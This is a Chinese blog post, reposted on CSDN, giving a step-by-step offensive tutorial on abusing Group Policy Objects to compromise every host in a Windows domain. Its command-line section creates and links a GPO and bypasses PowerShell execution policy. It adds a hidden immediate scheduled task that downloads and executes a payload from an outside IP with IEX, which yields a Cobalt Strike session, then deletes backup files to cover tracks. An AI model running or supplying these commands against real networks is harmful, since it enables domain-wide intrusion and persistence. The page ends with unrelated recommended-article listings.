利用页面链接打开cmd_利用GPO(组策略对象)批量控制域内主机

最新推荐文章于 2022-11-24 18:11:52 发布
最新推荐文章于 2022-11-24 18:11:52 发布
阅读量509 收藏 1
点赞数
文章标签: 利用页面链接打开cmd 域账户信息导出脚本 新建一个同名域能不能替换原域

原创作者:Shanfenglan7

作者介绍:一个刚步入安全行业的人,乐意分享技术,乐意接受批评,乐意交流。希望自己能把抽象的技术用尽量具体的语言讲出来,让每个人都能看懂,并觉得简单。最后希望大家可以关注我的博客:shanfenglan.blog.csdn.net

前提

拥有更改某组策略的权限或者域管权限

能够达到的效果

一次性控制域内所有配置了指定组策略的主机

利用思路

这里借鉴三好学生的原话:

根据不同情况,有以下两种利用思路:

1、新建组策略,创建计划任务实现远程执行

  • 创建一个新的GPO并链接到对应的域

  • 备份GPO

  • 修改Backup.xml和gpreport.xml

  • 创建ScheduledTasks.xml

  • 还原GPO 强制客户端刷新策略

  • 清理操作痕迹第二步到第五步可以通过脚本直接实现

2、修改已有组策略,替换计划任务

  • 如果域控制器上已有策略并配置了计划任务

  • 不再需要注册,修改ScheduledTasks.xml就好

实现

这里我们分为两种实现方式,在图形化界面下与cmd命令行中。

1、cmd命令行环境下

有时候我们没有图形化界面就需要通过这种方式来实现,这时候假设我们有域管权限。

  • 创建GPO
    powershell -c new-gpo -name TestGPO1

20e7b668c94d89577f2786a29b58c7d7.png

  • 链接GPO
    powershell -c New-GPLink -Name TestGPO1 -Target ‘dc=test,dc=com’

c6852cb56c6d5dadb3823749089f4a0c.png

  • 修改GPO并添加即时任务
    即时任务会在组策略同步的时候强制执行一次,组策略每90分钟自动同步一次。

34e82ed23124c21aaea46e62204de5bc.png

以下命令需进入powershell执行:

Set-ExecutionPolicy Bypass -Scope Process #绕过执行策略ebc9c208f4d082909b22dfd88ab85c75.pngImport-Module C:\Users\Administrator\Desktop\1.ps1 #导入脚本文件
脚本文件下载地址:https://github.com/3gstudent/Homework-of-Powershell/blob/master/New-GPOImmediateTask.ps15021496ccccf153d94dc3fde55c5b045.png

New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO1 -SysPath '\\dc.test.com\sysvol\test.com' -CommandArguments ‘-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('‘http://192.168.124.138:80/a'’))”‘ # 添加即时任务cca14453e175ecf58bccaeb6e59a298c.png/del /q /f ”{xxxxxx}“ # 删除对应的备份文件74308a2a334e849f07817b3137f2a51f.png

2、图形化界面实现

打开组策略管理,alt+r,在运行框内输入gpmc.msc即可进入,进入后如下图。f82d72670b98e2a68c2513fad2397ed9.png查看当前域加载了哪些组策略11a65fdae3688558b013c6b823f984d3.png

右键一个与域相关联的组策略点击编辑:7f572cf2c53560f4b94e6ce243da06e1.png进入计划任务这个选项dca21f64b3bb46442eef5ab537c480da.png在空白处右键点击创建即时任务7a7b91b069ea8eff912e545b6b9f5dfe.png填写任务名并切换到操作栏2a6ebd93523595ac41fcc692d91c0e90.png新建任务即可77e4d4b3eefa8d3987384c55e16208fa.png点完确定后会返回这个页面,切记要在这个页面点回车,而不是点右上角的叉。34cd07f993224267825384e4fe88a422.png以上操作做完之后,可以在客户机使用gpupdate /force命令强制同步组策略,这时候就会看到CS上线了。也可以等待90分钟组策略也会自动同步。

其他知识

关于GPO文件的琐碎知识

{6AC1786C-016F-11D2-945F-00C04fB984F9}对应Default Domain Controllers Policy
{31B2F340-016D-11D2-945F-00C04FB984F9}对应Default Domain Policyc63927d40b3eedb62cbd6aab09ff0915.png计划任务的配置文件放在如下的地方,就是图中的xml文件6417a3a5bda379390c3361ee26475257.png文件内容大约是这个样子23602fc72c370c31a501bb85844ed506.png

powershell函数传参相关

但我们要传输powershell命令的时候,如果参数重含有单引号" ’ ",这时候我们需要转义它,转义的方式为在它前面再加一个单引号。且powershell函数传参数的时候,尽量中单引号扩起来,系统只会将两个单引号之间的内容当作字符串传输,而不是当作命令,进而降低了出错概率。

其他GPO常见操作

通用操作如下:

加载GroupPolicy模块:

Import-Module GroupPolicy –verbose获得所有GPO的内容:

Get-GPO -All将所有GPO导出为一个HTML报告:

Get-GPOReport -All -ReportType html -Path C:\GposReport\GposReport.html将每个GPO单独导出一个HTML报告:

Get-GPO -All | %{ Get-GPOReport -name $_.displayname -ReportType html -path ("c:\GPOReports\"+$_.displayname+".html") }

查看指定GPO的权限设置:

Get-GPPermission -Name "TestGPO1" -All备份指定GPO:

Backup-Gpo -Name TestGPO1 -Path C:\GpoBackups备份所有GPO:

Backup-Gpo -All -Path "c:\GpoBackups"还原指定GPO:

Restore-GPO -Name TestGPO1 -Path C:\GpoBackups还原所有GPO:

Restore-GPO -All -Path "c:\GpoBackups"

扫描关注乌云安全

5c78876641708a775e999b52f3a2c056.png

觉得不错点个“赞”、“在看”哦4780bd501fa5f83119782d4f47d1bddd.png

weixin_39897218
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows 2008 R2组策略之二——GPO初探
weixin_33670786的博客
08-25 523
与前一篇博文发表已经相去月余了,实在是有些不好意思了。感谢51CTO的大编们将小文加了推荐,这使我更加觉得自己产出太少,难于回馈大家的厚爱。 今天将这个系列的第二篇奉献给大家,以伺视听。 在上篇小文中,我们谈及组策略管理工具——组策略管理器的使用,今天我们来谈谈组策略管理器管理的对象——GPO组策略对象)。GPO是我们接下来的系列文章要重点讨论的对象,那么什么是GPO呢?通俗地讲,就是组策略...
pytorch 转换onnx_ML.NET(一),使用一个现成的ONNX机器学习模型
weixin_32340083的博客
12-13 750
1、前言本篇在不需要很多机器学习相关知识以及 http://ML.NET 知识的情况下介绍一些机器学习方面的基本概念、工具以及如何利用 .NET Core 上的 http://ML.NET 机器学习框架使用一个已经训练好的机器学习模型。2、背景人工智能(Artificial intelligence/AI)也被称做机器智能,它是一种由机器展现出的“学习”与“解决问题”的智能,与之相对应就是自然智能...
python 替换_使用Python批量替换csdn文章的图片链接
weixin_39569543的博客
12-07 100
欢迎大家关注我的微信公众号“IT工匠”获取更多资源(涉及算法、数据结构、java、深度学习、计算机网络、python、Android等互联网技术资料)。前言笔者之前的写作习惯一直是在本地(Mac+Typora+Ipac)写好之后将markdown代码粘贴到csdn,图片是Ipac自动上传到微博匿名图床上,用了大概一年多都没有问题,直到前段时间突然发现我csdn文章里面的图片无法加载了,就像下面这样...
.net aspose.words 加载图片_机器学习框架ML.NET学习笔记【6】TensorFlow图片分类
weixin_35875219的博客
01-17 129
一、概述通过之前两篇文章的学习,我们应该已经了解了多元分类的工作原理,图片的分类其流程和之前完全一致,其中最核心的问题就是特征的提取,只要完成特征提取,分类算法就很好处理了,具体流程如下:之前介绍过,图片的特征是不能采用像素的灰度值的,这部分原理的台阶有点高,还好可以直接使用通过TensorFlow训练过的特征提取模型(美其名曰迁移学习)。模型文件为:tensorflow_incepti...
利用Aspose.Words将Word中表格转为图片
07-03
使用Aspose.Words将Word中表格转为图片,Convert table to image,可以作为借鉴将Node类型转为图片的样例
利用AD组策略实现软件部署
04-29
接下来,通过组策略管理编辑器(GPMC)创建一个新的组策略对象GPO),并将该策略链接到XYZ OU。 在GPO中,管理员可以使用“用户配置”或“计算机配置”来指定软件部署。在“用户配置”的“策略”>“Windows设置”...
通过组策略控制火狐浏览器,附件为火狐浏览器组策略模板
最新发布
04-16
1. **导入模板**:在AD控制器上,打开组策略管理器,创建一个新的GPO或选择一个已有的GPO,右键单击并选择“编辑”。然后,在组策略管理编辑器中导航到“用户配置”或“计算机配置”,根据需要添加相应的Firefox...
powershell 批量修改组策略GPO连接实例
03-11
标题中的“powershell 批量修改组策略GPO连接实例”指的是使用PowerShell脚本批量管理组策略对象(Group Policy Objects, GPO)的链接。PowerShell是Windows操作系统中的一个命令行工具,它提供了强大的自动化和...
AD组策略方式推送exe安装程序.rar_AD组策略推送_ad下发软件_ad推送_ad推送exe_策略下发exe
09-21
在标题和描述中提到的"AD组策略推送exe安装程序",是指通过AD组策略来自动化地在AD内分发并执行.exe可执行文件,从而实现软件的批量安装,特别是对于虚拟机环境,这种批量部署方法尤为高效。 首先,要实现这一...
GPO Schedule Task CMD Command(Solving CVE-2021-24074)
baobaoyu_的博客
02-22 311
GPO Schedule Task CMD Command open “Group Policy Management”->Domain Right click xxx.com to select “Create a GPO in this domain,and Link it here” ->Fill in a name such as test123->OK Edit the test123->User Configuration->Preferences->C
[笔记] 控使用CMD和PowerShell操作用户
wendr的博客
11-13 1615
Windows Server - 运维篇 第一章 控使用CMD和PowerShell操作用户
Windows控设置客户端禁用运行/cmd命令行【全策略生效】
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
12-21 2207
目录 策略:开始--管理工具--组策略管理 进入组策略界面 在主新建策略 ForbidCMD 右键编辑ForbidCMD策略 1、按照下图路径配置关闭 运行 功能 2、按照如下配置,关闭 CMD 命令行 设置之前效果 策略立即生效 客户端生效 策略:开始--管理工具--组策略管理 进入组策略界面 在主新建策略 ForbidCMD 右键编辑ForbidCMD策略 1、按照下图路径配置关闭 运行 功能 2、按照如下配置,...
Windows AD 控相关 CMD 命令
一直被模仿,从未被超越
11-24 1万+
AD控相关 CMD命令
Windows组策略同步问题
07-13 677
每当,我们在控制器上建立一个组策略的时候,我们很希望它能在线马上同步到所有的客户端上去。 当windows2008的控上的做法:登录到每台windows客户端然后执行,gpupdate /force 手动同步。 当windows2012的控上的做法:在组策略管理器上,相应的GPO上选择立即同步该组策略。 对于2008一直没有找到更好的办法,默认貌似必须重启客户端才会同步...
Aspose.words的一些操作(插入图片,替换标签数据,保存文件)
weixin_40029679的博客
01-29 3669
对象写入对应的数据位置:首先设定好书签位置。另外关于修改字体和字体颜色:修改Run字体。其中对于WrapType 理解是。对表格的操作,插入操作行。
使用aspose.words在doc文档里面插入内容(文字或图片)
lkb的博客
04-14 5440
1.主要工作函数,先在doc文档里面插入书签,然后通过WordHandleContext方法将文档内容转成对象去获取Document节点,Document节点可以提取书签名和书签位置,从而在书签位置插入内容 /** * 手动插入内容 * * @param doc * @param pngPath * @throws Exception */ public static void insertImageToPdf(Docume..
如何解决cmd运行startup出现'startup' 不是内部或外部命令,也不是可运行的程序 或批处理文件,在tomcat环境变量设置好的情况下。
weixin_43500545的博客
04-18 1万+
1、在系统变量里新建变量名:CATALINA_BASE,变量值:D:\apache-tomcat-9.0.34 在系统变量里新建变量名:CATALINA_HOME,变量值:D:\apache-tomcat-9.0.34 在系统变量里打开PATH,添加变量值:%CATALINA_HOME%\lib;%CATALINA_HOME%\bin 2、打开cmd,进入tomcat下的bin目录下,执行serv...
利用GPO(组策略对象)批量控制主机
热门推荐
Shanfenglan's blog
09-01 22万+
前提 拥有更改某组策略的权限或者管权限 能够达到的效果 一次性控制内所有配置了指定组策略主机 利用思路 这里借鉴三好学生的原话: 根据不同情况,有以下两种利用思路: 1、新建组策略,创建计划任务实现远程执行 创建一个新的GPO链接到对应的 备份GPO 修改Backup.xml和gpreport.xml 创建ScheduledTasks.xml 还原GPO 强制客户端刷新策略 清理操作痕迹 第二步到第五步可以通过脚本直接实现 2、修改已有组策略替换计划任务 如果控制器上已有策略并配置了计
控制器实验:OU管理与组策略详解
在本次实验中,我们将深入探讨控制器在Windows 2003环境下的组策略应用,以及组织单元(OU)的管理。课程安排在第五周,共三个教学课时,对应教案12-14。实验的主要目标包括掌握组织单元的创建和管理,以及如何在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值